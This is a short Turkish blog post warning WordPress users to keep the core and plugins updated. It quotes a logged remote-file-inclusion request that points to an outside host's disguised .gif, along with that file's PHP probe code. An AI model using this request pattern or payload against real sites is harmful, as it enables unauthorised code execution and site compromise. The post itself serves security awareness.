WordPress ve Eklentilerinizi Güncellemeyi Unutmayın.

Bazı eklentilerin güvenlik açıklarından ve WordPress'in eski sürümlerinin açıklarından yararlanmaya çalışanlar blogunuza zarar vermeye çalışıyorlar. Az önce istatistikleri gözden geçirirken birinin aşağıdaki gibi bir sorgu gerçekleştirdiğini gördüm.

"/2007/12/11/wordpress-tema-turkcele...pilir.html/%7B%7Bincludeddd%7D%7D%7B%7Bexit%7D%7D&ddd=http://www.ada-basket.com//galeries/test3/a.gif"

"http://www.....com/galeries/test3/a.gif" sitesindeki gif dosyasını indirip text formatında açtığımda aşağıdaki kodu görünce jeton düştü benim. Başarısız bir girişim olsa da sonuca oldukça yaklaşılmış.

"zfxid.txt <?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>"
Aklınızda olsun bu gibi sorunlarla karşılaşmamak için sadece wordpress değil, hangi içerik yönetim sistemini kullanıyorsanız güncel tutmaya çalışın. Eklenti konusunda seçici davranın. Güvenmediğiniz eklentileri yüklemeyin.

Bu yazı 3 Eylül 2010 Cuma günü Onur Pay tarafından yazıldı

Siz ne diyorsunuz?

Valid XHTML 1.0 Transitional Valid CSS!